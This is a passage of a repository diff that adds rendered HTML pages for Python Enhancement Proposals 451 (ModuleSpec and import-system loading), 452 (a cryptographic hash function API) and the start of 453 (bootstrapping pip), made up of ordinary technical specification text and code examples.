The answer to this gap is a ModuleSpec object that contains the +per-module information and takes care of the boilerplate functionality +involved with loading the module.

+
+
+

Specification

+

The goal is to address the gap between finders and loaders while +changing as little of their semantics as possible. Though some +functionality and information is moved to the new ModuleSpec type, +their behavior should remain the same. However, for the sake of clarity +the finder and loader semantics will be explicitly identified.

+

Here is a high-level summary of the changes described by this PEP. More +detail is available in later sections.

+
+

importlib.machinery.ModuleSpec (new)

+

An encapsulation of a module’s import-system-related state during import. +See the ModuleSpec section below for a more detailed description.

+
    +
  • ModuleSpec(name, loader, *, origin=None, loader_state=None, is_package=None)
  • +
+

Attributes:

+
    +
  • name - a string for the fully-qualified name of the module.
  • +
  • loader - the loader to use for loading.
  • +
  • origin - the name of the place from which the module is loaded, +e.g. “builtin” for built-in modules and the filename for modules +loaded from source.
  • +
  • submodule_search_locations - list of strings for where to find +submodules, if a package (None otherwise).
  • +
  • loader_state - a container of extra module-specific data for use +during loading.
  • +
  • cached (property) - a string for where the compiled module should be +stored.
  • +
  • parent (RO-property) - the fully-qualified name of the package to +which the module belongs as a submodule (or None).
  • +
  • has_location (RO-property) - a flag indicating whether or not the +module’s “origin” attribute refers to a location.
  • +
+
+
+

importlib.util Additions

+

These are ModuleSpec factory functions, meant as a convenience for +finders. See the Factory Functions section below for more detail.

+
    +
  • spec_from_file_location(name, location, *, loader=None, submodule_search_locations=None) +- build a spec from file-oriented information and loader APIs.
  • +
  • spec_from_loader(name, loader, *, origin=None, is_package=None) +- build a spec with missing information filled in by using loader +APIs.
  • +
+
+
+

Other API Additions

+
    +
  • importlib.find_spec(name, path=None, target=None) will work exactly +the same as importlib.find_loader() (which it replaces), but return a +spec instead of a loader.
  • +
+

For finders:

+
    +
  • importlib.abc.MetaPathFinder.find_spec(name, path, target) and +importlib.abc.PathEntryFinder.find_spec(name, target) will return a +module spec to use during import.
  • +
+

For loaders:

+
    +
  • importlib.abc.Loader.exec_module(module) will execute a module in its +own namespace. It replaces importlib.abc.Loader.load_module(), taking +over its module execution functionality.
  • +
  • importlib.abc.Loader.create_module(spec) (optional) will return the +module to use for loading.
  • +
+

For modules:

+
    +
  • Module objects will have a new attribute: __spec__.
  • +
+
+
+

API Changes

+
    +
  • InspectLoader.is_package() will become optional.
  • +
+
+
+

Deprecations

+
    +
  • importlib.abc.MetaPathFinder.find_module()
  • +
  • importlib.abc.PathEntryFinder.find_module()
  • +
  • importlib.abc.PathEntryFinder.find_loader()
  • +
  • importlib.abc.Loader.load_module()
  • +
  • importlib.abc.Loader.module_repr()
  • +
  • importlib.util.set_package()
  • +
  • importlib.util.set_loader()
  • +
  • importlib.find_loader()
  • +
+
+
+

Removals

+

These were introduced prior to Python 3.4’s release, so they can simply +be removed.

+
    +
  • importlib.abc.Loader.init_module_attrs()
  • +
  • importlib.util.module_to_load()
  • +
+
+
+

Other Changes

+
    +
  • The import system implementation in importlib will be changed to make +use of ModuleSpec.
  • +
  • importlib.reload() will make use of ModuleSpec.
  • +
  • A module’s import-related attributes (other than __spec__) will no +longer be used directly by the import system during that module’s +import. However, this does not impact use of those attributes +(e.g. __path__) when loading other modules (e.g. submodules).
  • +
  • Import-related attributes should no longer be added to modules +directly, except by the import system.
  • +
  • The module type’s __repr__() will be a thin wrapper around a pure +Python implementation which will leverage ModuleSpec.
  • +
  • The spec for the __main__ module will reflect the appropriate +name and origin.
  • +
+
+
+

Backward-Compatibility

+
    +
  • If a finder does not define find_spec(), a spec is derived from +the loader returned by find_module().
  • +
  • PathEntryFinder.find_loader() still takes priority over +find_module().
  • +
  • Loader.load_module() is used if exec_module() is not defined.
  • +
+
+
+

What Will not Change?

+
    +
  • The syntax and semantics of the import statement.
  • +
  • Existing finders and loaders will continue to work normally.
  • +
  • The import-related module attributes will still be initialized with +the same information.
  • +
  • Finders will still create loaders (now storing them in specs).
  • +
  • Loader.load_module(), if a module defines it, will have all the +same requirements and may still be called directly.
  • +
  • Loaders will still be responsible for module data APIs.
  • +
  • importlib.reload() will still overwrite the import-related attributes.
  • +
+
+
+

Responsibilities

+

Here’s a quick breakdown of where responsibilities lie after this PEP.

+

finders:

+
    +
  • create/identify a loader that can load the module.
  • +
  • create the spec for the module.
  • +
+

loaders:

+
    +
  • create the module (optional).
  • +
  • execute the module.
  • +
+

ModuleSpec:

+
    +
  • orchestrate module loading
  • +
  • boilerplate for module loading, including managing sys.modules and +setting import-related attributes
  • +
  • create module if loader doesn’t
  • +
  • call loader.exec_module(), passing in the module in which to exec
  • +
  • contain all the information the loader needs to exec the module
  • +
  • provide the repr for modules
  • +
+
+
+
+

What Will Existing Finders and Loaders Have to Do Differently?

+

Immediately? Nothing. The status quo will be deprecated, but will +continue working. However, here are the things that the authors of +finders and loaders should change relative to this PEP:

+
    +
  • Implement find_spec() on finders.
  • +
  • Implement exec_module() on loaders, if possible.
  • +
+

The ModuleSpec factory functions in importlib.util are intended to be +helpful for converting existing finders. spec_from_loader() and +spec_from_file_location() are both straightforward utilities in this +regard.

+

For existing loaders, exec_module() should be a relatively direct +conversion from the non-boilerplate portion of load_module(). In some +uncommon cases the loader should also implement create_module().
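As a rough sketch of what a converted finder/loader pair might look like (StringFinder and StringLoader are hypothetical names, not part of this proposal):

import importlib.abc
import importlib.util
import sys

class StringLoader(importlib.abc.Loader):
    """Loads a module from an in-memory source string."""

    def __init__(self, source):
        self.source = source

    def exec_module(self, module):
        # The import machinery has already created the module and set
        # its import-related attributes from the spec.
        exec(self.source, module.__dict__)

class StringFinder(importlib.abc.MetaPathFinder):
    """Maps module names to source strings."""

    def __init__(self, sources):
        self.sources = sources

    def find_spec(self, name, path=None, target=None):
        if name not in self.sources:
            return None
        loader = StringLoader(self.sources[name])
        return importlib.util.spec_from_loader(name, loader)

# Usage:
#   sys.meta_path.insert(0, StringFinder({'greeting': "msg = 'hi'"}))
#   import greeting; greeting.msg  ->  'hi'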

+
+
+

ModuleSpec Users

+

ModuleSpec objects have 3 distinct target audiences: Python itself, +import hooks, and normal Python users.

+

Python will use specs in the import machinery, in interpreter startup, +and in various standard library modules. Some modules are +import-oriented, like pkgutil, and others are not, like pickle and +pydoc. In all cases, the full ModuleSpec API will get used.

+

Import hooks (finders and loaders) will make use of the spec in specific ways. First of all, finders may use the spec factory functions in importlib.util to create spec objects. They may also directly adjust the spec attributes after the spec is created. Secondly, the finder may bind additional information to the spec (in loader_state) for the loader to consume during module creation/execution. Finally, loaders will make use of the attributes on a spec when creating and/or executing a module.

+

Python users will be able to inspect a module’s __spec__ to get import-related information about the object. Generally, Python applications and interactive users will not be using the ModuleSpec factory functions nor any of the instance methods.
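For example, inspecting a spec interactively might look like this (illustrative):

>>> import json
>>> json.__spec__.name
'json'
>>> json.__spec__.parent    # json is a package, so it is its own parent
'json'
>>> json.__spec__.has_location
True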

+
+
+

How Loading Will Work

+

Here is an outline of what the import machinery does during loading, +adjusted to take advantage of the module’s spec and the new loader API:

+
module = None
+if spec.loader is not None and hasattr(spec.loader, 'create_module'):
+    module = spec.loader.create_module(spec)
+if module is None:
+    module = ModuleType(spec.name)
+# The import-related module attributes get set here:
+_init_module_attrs(spec, module)
+
+if spec.loader is None and spec.submodule_search_locations is not None:
+    # Namespace package
+    sys.modules[spec.name] = module
+elif not hasattr(spec.loader, 'exec_module'):
+    spec.loader.load_module(spec.name)
+    # __loader__ and __package__ would be explicitly set here for
+    # backwards-compatibility.
+else:
+    sys.modules[spec.name] = module
+    try:
+        spec.loader.exec_module(module)
+    except BaseException:
+        try:
+            del sys.modules[spec.name]
+        except KeyError:
+            pass
+        raise
+module_to_return = sys.modules[spec.name]
+
+
+

These steps are exactly what Loader.load_module() is already +expected to do. Loaders will thus be simplified since they will only +need to implement exec_module().

+

Note that we must return the module from sys.modules. During loading +the module may have replaced itself in sys.modules. Since we don’t have +a post-import hook API to accommodate the use case, we have to deal with +it. However, in the replacement case we do not worry about setting the +import-related module attributes on the object. The module writer is on +their own if they are doing this.

+
+
+

How Reloading Will Work

+

Here is the corresponding outline for reload():

+
_RELOADING = {}
+
+def reload(module):
+    try:
+        name = module.__spec__.name
+    except AttributeError:
+        name = module.__name__
+    spec = find_spec(name, target=module)
+
+    if sys.modules.get(name) is not module:
+        raise ImportError
+    if name in _RELOADING:
+        return _RELOADING[name]
+    _RELOADING[name] = module
+    try:
+        if spec.loader is None:
+            # Namespace loader
+            _init_module_attrs(spec, module)
+            return module
+        if spec.parent and spec.parent not in sys.modules:
+            raise ImportError
+
+        _init_module_attrs(spec, module)
+        # Ignoring backwards-compatibility call to load_module()
+        # for simplicity.
+        spec.loader.exec_module(module)
+        return sys.modules[name]
+    finally:
+        del _RELOADING[name]
+
+
+

A key point here is that the switch to Loader.exec_module() means that loaders will no longer have an easy way to know at execution time if it is a reload or not. Before this proposal, they could simply check to see if the module was already in sys.modules. Now, by the time exec_module() is called during load (not reload) the import machinery would already have placed the module in sys.modules. This is part of the reason why find_spec() has the “target” parameter.

+

The semantics of reload will remain essentially the same as they exist +already [5]. The impact of this PEP on some kinds +of lazy loading modules was a point of discussion. [4]

+
+
+

ModuleSpec

+
+

Attributes

+

Each of the following names is an attribute on ModuleSpec objects. A +value of None indicates “not set”. This contrasts with module +objects where the attribute simply doesn’t exist. Most of the +attributes correspond to the import-related attributes of modules. Here +is the mapping. The reverse of this mapping describes how the import +machinery sets the module attributes right before calling exec_module().

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
On ModuleSpecOn Modules
name__name__
loader__loader__
parent__package__
origin__file__*
cached__cached__*,**
submodule_search_locations__path__**
loader_state-
has_location-
+
+
* Set on the module only if spec.has_location is true.
+
** Set on the module only if the spec attribute is not None.
+
+

While parent and has_location are read-only properties, the remaining +attributes can be replaced after the module spec is created and even +after import is complete. This allows for unusual cases where directly +modifying the spec is the best option. However, typical use should not +involve changing the state of a module’s spec.

+

origin

+

“origin” is a string for the name of the place from which the module +originates. See origin above. Aside from the informational value, +it is also used in the module’s repr. In the case of a spec where +“has_location” is true, __file__ is set to the value of “origin”. +For built-in modules “origin” would be set to “built-in”.

+

has_location

+

As explained in the location section above, many modules are +“locatable”, meaning there is a corresponding resource from which the +module will be loaded and that resource can be described by a string. +In contrast, non-locatable modules can’t be loaded in this fashion, e.g. +builtin modules and modules dynamically created in code. For these, the +name is the only way to access them, so they have an “origin” but not a +“location”.

+

“has_location” is true if the module is locatable. In that case the +spec’s origin is used as the location and __file__ is set to +spec.origin. If additional location information is required (e.g. +zipimport), that information may be stored in spec.loader_state.

+

“has_location” may be implied from the existence of a get_data() method on the loader.

+

Incidentally, not all locatable modules will be cache-able, but most +will.

+

submodule_search_locations

+

The list of location strings, typically directory paths, in which to +search for submodules. If the module is a package this will be set to +a list (even an empty one). Otherwise it is None.

+

The name of the corresponding module attribute, __path__, is +relatively ambiguous. Instead of mirroring it, we use a more explicit +attribute name that makes the purpose clear.

+

loader_state

+

A finder may set loader_state to any value to provide additional +data for the loader to use during loading. A value of None is the +default and indicates that there is no additional data. Otherwise it +can be set to any object, such as a dict, list, or +types.SimpleNamespace, containing the relevant extra information.

+

For example, zipimporter could use it to pass the zip archive name +to the loader directly, rather than needing to derive it from origin +or create a custom loader for each find operation.

+

loader_state is meant for use by the finder and corresponding loader. +It is not guaranteed to be a stable resource for any other use.

+
+
+

Factory Functions

+

spec_from_file_location(name, location, *, loader=None, submodule_search_locations=None)

+

Build a spec from file-oriented information and loader APIs.

+
    +
  • “origin” will be set to the location.
  • +
  • “has_location” will be set to True.
  • +
  • “cached” will be set to the result of calling cache_from_source().
  • +
  • “origin” can be deduced from loader.get_filename() (if “location” is not passed in).
  • +
  • “loader” can be deduced from suffix if the location is a filename.
  • +
  • “submodule_search_locations” can be deduced from loader.is_package() +and from os.path.dirname(location) if location is a filename.
  • +
+

spec_from_loader(name, loader, *, origin=None, is_package=None)

+

Build a spec with missing information filled in by using loader APIs.

+
    +
  • “has_location” can be deduced from loader.get_data.
  • +
  • “origin” can be deduced from loader.get_filename().
  • +
  • “submodule_search_locations” can be deduced from loader.is_package() +and from os.path.dirname(location) if location is a filename.
  • +
+
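For instance, building a spec for a source file might look like this (the path is hypothetical):

>>> from importlib.util import spec_from_file_location
>>> spec = spec_from_file_location('mymod', '/tmp/mymod.py')
>>> spec.name, spec.origin, spec.has_location
('mymod', '/tmp/mymod.py', True)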
+
+

Backward Compatibility

+

ModuleSpec doesn’t have any. This would be a different story if +Finder.find_module() were to return a module spec instead of loader. +In that case, specs would have to act like the loader that would have +been returned instead. Doing so would be relatively simple, but is an +unnecessary complication. It was part of earlier versions of this PEP.

+
+
+

Subclassing

+

Subclasses of ModuleSpec are allowed, but should not be necessary. +Simply setting loader_state or adding functionality to a custom +finder or loader will likely be a better fit and should be tried first. +However, as long as a subclass still fulfills the requirements of the +import system, objects of that type are completely fine as the return +value of Finder.find_spec(). The same points apply to duck-typing.

+
+
+
+

Existing Types

+
+

Module Objects

+

Other than adding __spec__, none of the import-related module +attributes will be changed or deprecated, though some of them could be; +any such deprecation can wait until Python 4.

+

A module’s spec will not be kept in sync with the corresponding +import-related attributes. Though they may differ, in practice they +will typically be the same.

+

One notable exception is that case where a module is run as a script by +using the -m flag. In that case module.__spec__.name will +reflect the actual module name while module.__name__ will be +__main__.

+

A module’s spec is not guaranteed to be identical between two modules +with the same name. Likewise there is no guarantee that successive +calls to importlib.find_spec() will return the same object or even an +equivalent object, though at least the latter is likely.

+
+
+

Finders

+

Finders are still responsible for identifying, and typically creating, +the loader that should be used to load a module. That loader will +now be stored in the module spec returned by find_spec() rather +than returned directly. As is currently the case without the PEP, if a +loader would be costly to create, that loader can be designed to defer +the cost until later.

+

MetaPathFinder.find_spec(name, path=None, target=None)

+

PathEntryFinder.find_spec(name, target=None)

+

Finders must return ModuleSpec objects when find_spec() is called. This new method replaces find_module() and find_loader() (in the PathEntryFinder case). If a finder does not have find_spec(), find_module() and find_loader() are used instead, for backward compatibility.
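A minimal sketch of a meta path finder using the new method (the module name and loader are hypothetical):

import sys
from importlib.machinery import ModuleSpec

class DemoLoader:
    def exec_module(self, module):
        module.answer = 42   # populate the module namespace

class DemoFinder:
    def find_spec(self, name, path=None, target=None):
        if name == "demo":
            return ModuleSpec(name, DemoLoader())
        return None   # defer to the remaining finders on sys.meta_path

sys.meta_path.insert(0, DemoFinder())   # after this, 'import demo' works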

+

Adding yet another similar method to finders is a case of practicality. find_module() could be changed to return specs instead of loaders. This is tempting because the import APIs have suffered enough, especially considering PathEntryFinder.find_loader() was just added in Python 3.3. However, the extra complexity and a less-than-explicit method name aren’t worth it.

+
+
+

The “target” parameter of find_spec()

+

A call to find_spec() may optionally include a “target” argument. This +is the module object that will be used subsequently as the target of +loading. During normal import (and by default) “target” is None, +meaning the target module has yet to be created. During reloading the +module passed in to reload() is passed through to find_spec() as the +target. This argument allows the finder to build the module spec with +more information than is otherwise available. Doing so is particularly +relevant in identifying the loader to use.

+

Through find_spec() the finder will always identify the loader it +will return in the spec (or return None). At the point the loader is +identified, the finder should also decide whether or not the loader +supports loading into the target module, in the case that “target” is +passed in. This decision may entail consulting with the loader.

+

If the finder determines that the loader does not support loading into +the target module, it should either find another loader or raise +ImportError (completely stopping import of the module). This +determination is especially important during reload since, as noted in +How Reloading Will Work, loaders will no longer be able to trivially +identify a reload situation on their own.
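A sketch of how a finder might honor “target”, assuming two hypothetical helpers (_identify_loader() and _loader_accepts()) that a real finder would implement:

from importlib.machinery import ModuleSpec

class ReloadAwareFinder:
    def find_spec(self, name, path=None, target=None):
        loader = self._identify_loader(name)   # hypothetical helper
        if loader is None:
            return None
        # During reload, 'target' is the existing module object.
        if target is not None and not self._loader_accepts(loader, target):
            raise ImportError("cannot load into target module", name=name)
        return ModuleSpec(name, loader)

    def _identify_loader(self, name):
        return None   # stub; a real finder identifies a loader here

    def _loader_accepts(self, loader, target):
        return True   # stub; may entail consulting the loader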

+

Two alternatives were presented to the “target” parameter: +Loader.supports_reload() and adding “target” to Loader.exec_module() +instead of find_spec(). supports_reload() was the initial approach to +the reload situation. [6] However, there was some +opposition to the loader-specific, reload-centric approach. +[7]

+

As to “target” on exec_module(), the loader may need other information +from the target module (or spec) during reload, more than just “does +this loader support reloading this module”, that is no longer available +with the move away from load_module(). A proposal on the table was to +add something like “target” to exec_module(). [8] +However, putting “target” on find_spec() instead is more in line with +the goals of this PEP. Furthermore, it obviates the need for +supports_reload().

+
+
+

Namespace Packages

+

Currently a path entry finder may return (None, portions) from +find_loader() to indicate it found part of a possible namespace +package. To achieve the same effect, find_spec() must return a spec +with “loader” set to None (a.k.a. not set) and with +submodule_search_locations set to the same portions as would have been +provided by find_loader(). It’s up to PathFinder how to handle such +specs.
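A sketch of the spec-based equivalent of the legacy (None, portions) return value (the function name is illustrative):

from importlib.machinery import ModuleSpec

def namespace_portion_spec(name, portions):
    spec = ModuleSpec(name, None)    # "loader" deliberately not set
    spec.submodule_search_locations = list(portions)
    return spec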

+
+
+

Loaders

+

Loader.exec_module(module)

+

Loaders will have a new method, exec_module(). Its only job +is to “exec” the module and consequently populate the module’s +namespace. It is not responsible for creating or preparing the module +object, nor for any cleanup afterward. It has no return value. +exec_module() will be used during both loading and reloading.

+

exec_module() should properly handle the case where it is called more +than once. For some kinds of modules this may mean raising ImportError +every time after the first time the method is called. This is +particularly relevant for reloading, where some kinds of modules do not +support in-place reloading.
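A sketch of a loader whose modules do not support in-place reloading (names illustrative):

class OneShotLoader:
    def __init__(self):
        self._executed = set()

    def exec_module(self, module):
        name = module.__spec__.name
        if name in self._executed:
            # This kind of module cannot be re-executed in place.
            raise ImportError("%s does not support reloading" % name,
                              name=name)
        self._executed.add(name)
        module.value = 42   # "exec" the module: populate its namespace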

+

Loader.create_module(spec)

+

Loaders may also implement create_module(), which will return a new module to exec. It may return None to indicate that the default module creation code should be used. One use case, though atypical, for create_module() is to provide a module that is a subclass of the builtin module type. Most loaders will not need to implement create_module().

+

create_module() should properly handle the case where it is called more +than once for the same spec/module. This may include returning None or +raising ImportError.
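A sketch of the atypical subclassing use case (names illustrative):

import types

class VerboseModule(types.ModuleType):
    def __repr__(self):
        return "<verbose module %s>" % self.__name__

class SubclassingLoader:
    def create_module(self, spec):
        # Returning None instead would request the default creation code.
        return VerboseModule(spec.name)

    def exec_module(self, module):
        module.ready = True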

+
+

Note

+

exec_module() and create_module() should not set any import-related +module attributes. The fact that load_module() does is a design flaw +that this proposal aims to correct.

+
+

Other changes:

+

PEP 420 introduced the optional module_repr() loader method to limit +the amount of special-casing in the module type’s __repr__(). Since +this method is part of ModuleSpec, it will be deprecated on loaders. +However, if it exists on a loader it will be used exclusively.

+

The Loader.init_module_attrs() method, added prior to Python 3.4’s release, will be removed in favor of the same method on ModuleSpec.

+

However, InspectLoader.is_package() will not be deprecated even +though the same information is found on ModuleSpec. ModuleSpec +can use it to populate its own is_package if that information is +not otherwise available. Still, it will be made optional.

+

In addition to executing a module during loading, loaders will still be +directly responsible for providing APIs concerning module-related data.

+
+
+
+

Other Changes

+
    +
  • The various finders and loaders provided by importlib will be +updated to comply with this proposal.
  • +
  • Any other implementations of or dependencies on the import-related APIs +(particularly finders and loaders) in the stdlib will be likewise +adjusted to this PEP. While they should continue to work, any such +changes that get missed should be considered bugs for the Python 3.4.x +series.
  • +
  • The spec for the __main__ module will reflect how the interpreter +was started. For instance, with -m the spec’s name will be that +of the module used, while __main__.__name__ will still be +“__main__”.
  • +
  • We will add importlib.find_spec() to mirror importlib.find_loader() +(which becomes deprecated).
  • +
  • importlib.reload() is changed to use ModuleSpec.
  • +
  • importlib.reload() will now make use of the per-module import lock.
  • +
+
+
+

Reference Implementation

+

A reference implementation is available at +http://bugs.python.org/issue18864.

+
+

Implementation Notes

+

  • The implementation of this PEP needs to be cognizant of its impact on pkgutil (and setuptools). pkgutil has some generic function-based extensions to PEP 302 which may break if importlib starts wrapping loaders without the tools’ knowledge.

+

  • Other modules to look at: runpy (and pythonrun.c), pickle, pydoc, inspect.

+

For instance, pickle should be updated in the __main__ case to look +at module.__spec__.name.

+
+
+
+

Rejected Additions to the PEP

+

There were a few proposed additions to this proposal that did not fit +well enough into its scope.

+

There is no “PathModuleSpec” subclass of ModuleSpec that separates out +has_location, cached, and submodule_search_locations. While that might +make the separation cleaner, module objects don’t have that distinction. +ModuleSpec will support both cases equally well.

+

While “ModuleSpec.is_package” would be a simple additional attribute +(aliasing self.submodule_search_locations is not None), it perpetuates +the artificial (and mostly erroneous) distinction between modules and +packages.

+

The module spec Factory Functions could be classmethods on +ModuleSpec. However that would expose them on all modules via +__spec__, which has the potential to unnecessarily confuse +non-advanced Python users. The factory functions have a specific use +case, to support finder authors. See ModuleSpec Users.

+

Likewise, several other methods could be added to ModuleSpec that expose +the specific uses of module specs by the import machinery:

+
    +
  • create() - a wrapper around Loader.create_module().
  • +
  • exec(module) - a wrapper around Loader.exec_module().
  • +
  • load() - an analogue to the deprecated Loader.load_module().
  • +
+

As with the factory functions, exposing these methods via module.__spec__ is less than desirable. They would end up being an attractive nuisance, even if only exposed as “private” attributes (as they were in previous versions of this PEP). If someone finds a need for these methods later, we can expose them via an appropriate API (separate from ModuleSpec) at that point, perhaps relative to PEP 406 (import engine).

+

Conceivably, the load() method could optionally take a list of +modules with which to interact instead of sys.modules. Also, load() +could be leveraged to implement multi-version imports. Both are +interesting ideas, but definitely outside the scope of this proposal.

+

Others left out:

+
    +
  • Add ModuleSpec.submodules (RO-property) - returns possible submodules +relative to the spec.
  • +
  • Add ModuleSpec.loaded (RO-property) - the module in sys.modules, if any.
  • +
  • Add ModuleSpec.data - a descriptor that wraps the data API of the +spec’s loader.
  • +
  • Also see [3].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0451.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0452/index.html b/pep-0452/index.html new file mode 100644 index 00000000000..1a0c982c5bb --- /dev/null +++ b/pep-0452/index.html @@ -0,0 +1,368 @@ + PEP 452 – API for Cryptographic Hash Functions v2.0 | peps.python.org +
+
+


+ + +
+
+
+

PEP 452 – API for Cryptographic Hash Functions v2.0

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>, Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
15-Aug-2013
+
Post-History:
+

+
Replaces:
+
247
+
+
+
+
+
+

Abstract

+

There are several different modules available that implement +cryptographic hashing algorithms such as MD5 or SHA. This +document specifies a standard API for such algorithms, to make it +easier to switch between different implementations.

+
+
+

Specification

+

All hashing modules should present the same interface. Additional +methods or variables can be added, but those described in this +document should always be present.

+

Hash function modules define one function:

+

new([string])            (unkeyed hashes)

+
+
new(key, [string], [digestmod])    (keyed hashes)
Create a new hashing object and return it. The first form is +for hashes that are unkeyed, such as MD5 or SHA. For keyed +hashes such as HMAC, ‘key’ is a required parameter containing +a string giving the key to use. In both cases, the optional +‘string’ parameter, if supplied, will be immediately hashed +into the object’s starting state, as if obj.update(string) was +called.

After creating a hashing object, arbitrary bytes can be fed +into the object using its update() method, and the hash value +can be obtained at any time by calling the object’s digest() +method.

+

Although the parameter is called ‘string’, hashing objects operate on 8-bit data only. Both ‘key’ and ‘string’ must be bytes-like objects (bytes, bytearray…). A hashing object may support one-dimensional, contiguous buffers as argument, too. Text (unicode) is no longer supported in Python 3.x. Python 2.x implementations may take ASCII-only unicode as argument, but portable code should not rely on the feature.

+

Arbitrary additional keyword arguments can be added to this +function, but if they’re not supplied, sensible default values +should be used. For example, ‘rounds’ and ‘digest_size’ +keywords could be added for a hash function which supports a +variable number of rounds and several different output sizes, +and they should default to values believed to be secure.
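For instance, a minimal unkeyed-hash module compliant with this constructor specification could simply wrap a hashlib constructor (the wrapper shown is an illustrative sketch, not part of the specification):

import hashlib

digest_size = 32   # SHA-256 produces 32-byte digests

def new(string=b''):
    # The returned object provides update(), digest(), hexdigest(),
    # copy(), digest_size, block_size and name, as specified below.
    return hashlib.sha256(string)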

+
+
+

Hash function modules define one variable:

+
+
digest_size
An integer value; the size of the digest produced by the +hashing objects created by this module, measured in bytes. +You could also obtain this value by creating a sample object +and accessing its ‘digest_size’ attribute, but it can be +convenient to have this value available from the module. +Hashes with a variable output size will set this variable to +None.
+
+

Hashing objects require the following attribute:

+
+
digest_size
This attribute is identical to the module-level digest_size +variable, measuring the size of the digest produced by the +hashing object, measured in bytes. If the hash has a variable +output size, this output size must be chosen when the hashing +object is created, and this attribute must contain the +selected size. Therefore, None is not a legal value for this +attribute.
+
block_size
An integer value or NotImplemented; the internal block size of the hash algorithm in bytes. The block size is used by the HMAC module to pad the secret key to block_size or to hash the secret key if it is longer than block_size. If no HMAC algorithm is standardized for the hash algorithm, return NotImplemented instead.
+
name
A text string value; the canonical, lowercase name of the hashing +algorithm. The name should be a suitable parameter for +hashlib.new.
+
+

Hashing objects require the following methods:

+
+
copy()
Return a separate copy of this hashing object. An update to +this copy won’t affect the original object.
+
digest()
Return the hash value of this hashing object as a bytes +containing 8-bit data. The object is not altered in any way +by this function; you can continue updating the object after +calling this function.
+
hexdigest()
Return the hash value of this hashing object as a string +containing hexadecimal digits. Lowercase letters should be used +for the digits ‘a’ through ‘f’. Like the .digest() method, this +method mustn’t alter the object.
+
update(string)
Hash bytes-like ‘string’ into the current state of the hashing +object. update() can be called any number of times during a +hashing object’s lifetime.
+
+

Hashing modules can define additional module-level functions or +object methods and still be compliant with this specification.

+

Here’s an example, using a module named ‘MD5’:

+
>>> import hashlib
+>>> from Crypto.Hash import MD5
+>>> m = MD5.new()
+>>> isinstance(m, hashlib.CryptoHash)
+True
+>>> m.name
+'md5'
+>>> m.digest_size
+16
+>>> m.block_size
+64
+>>> m.update(b'abc')
+>>> m.digest()
+b'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+>>> m.hexdigest()
+'900150983cd24fb0d6963f7d28e17f72'
+>>> MD5.new(b'abc').digest()
+b'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+
+
+
+
+

Rationale

+

The digest size is measured in bytes, not bits, even though hash +algorithm sizes are usually quoted in bits; MD5 is a 128-bit +algorithm and not a 16-byte one, for example. This is because, in +the sample code I looked at, the length in bytes is often needed +(to seek ahead or behind in a file; to compute the length of an +output string) while the length in bits is rarely used. +Therefore, the burden will fall on the few people actually needing +the size in bits, who will have to multiply digest_size by 8.

+

It’s been suggested that the update() method would be better named +append(). However, that method is really causing the current +state of the hashing object to be updated, and update() is already +used by the md5 and sha modules included with Python, so it seems +simplest to leave the name update() alone.

+

The order of the constructor’s arguments for keyed hashes was a +sticky issue. It wasn’t clear whether the key should come first +or second. It’s a required parameter, and the usual convention is +to place required parameters first, but that also means that the +‘string’ parameter moves from the first position to the second. +It would be possible to get confused and pass a single argument to +a keyed hash, thinking that you’re passing an initial string to an +unkeyed hash, but it doesn’t seem worth making the interface +for keyed hashes more obscure to avoid this potential error.

+
+
+

Changes from Version 1.0 to Version 2.0

+

Version 2.0 of API for Cryptographic Hash Functions clarifies some +aspects of the API and brings it up-to-date. It also formalized aspects +that were already de facto standards and provided by most +implementations.

+

Version 2.0 introduces the following new attributes:

+
+
name
The name property was made mandatory by issue 18532.
+
block_size
The new version also specifies that the return value +NotImplemented prevents HMAC support.
+
+

Version 2.0 takes the separation of binary and text data in Python 3.0 into account. The ‘string’ argument to new() and update() as well as the ‘key’ argument must be bytes-like objects. On Python 2.x a hashing object may also support ASCII-only unicode. The actual name of the argument is not changed as it is part of the public API; code may depend on the fact that the argument is called ‘string’.

+
+ +
+

Changes

+
    +
  • 2001-09-17: Renamed clear() to reset(); added digest_size attribute +to objects; added .hexdigest() method.
  • +
  • 2001-09-20: Removed reset() method completely.
  • +
  • 2001-09-28: Set digest_size to None for variable-size hashes.
  • +
  • 2013-08-15: Added block_size and name attributes; clarified that +‘string’ actually refers to bytes-like objects.
  • +
+
+
+

Acknowledgements

+

Thanks to Aahz, Andrew Archibald, Rich Salz, Itamar +Shtull-Trauring, and the readers of the python-crypto list for +their comments on this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0452.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0453/index.html b/pep-0453/index.html new file mode 100644 index 00000000000..c7446a6d955 --- /dev/null +++ b/pep-0453/index.html @@ -0,0 +1,1135 @@ + PEP 453 – Explicit bootstrapping of pip in Python installations | peps.python.org +
+
+


+ + +
+
+
+

PEP 453 – Explicit bootstrapping of pip in Python installations

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Martin von Löwis
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Aug-2013
+
Post-History:
+
30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, +23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP proposes that the +Installing Python Modules guide in +Python 2.7, 3.3 and 3.4 be updated to officially recommend the use of pip +as the default installer for Python packages, and that appropriate technical +changes be made in Python 3.4 to provide pip by default in support of +that recommendation.

+
+
+

PEP Acceptance

+

This PEP was accepted for inclusion in Python 3.4 by Martin von Löwis on +Tuesday 22nd October, 2013.

+

Issue 19347 has been created to +track the implementation of this PEP.

+
+
+

Rationale

+

There are two related, but distinct rationales for the proposal in this +PEP. The first relates to the experience of new users, while the second +relates to better enabling the evolution of the broader Python packaging +ecosystem.

+
+

Improving the new user experience

+

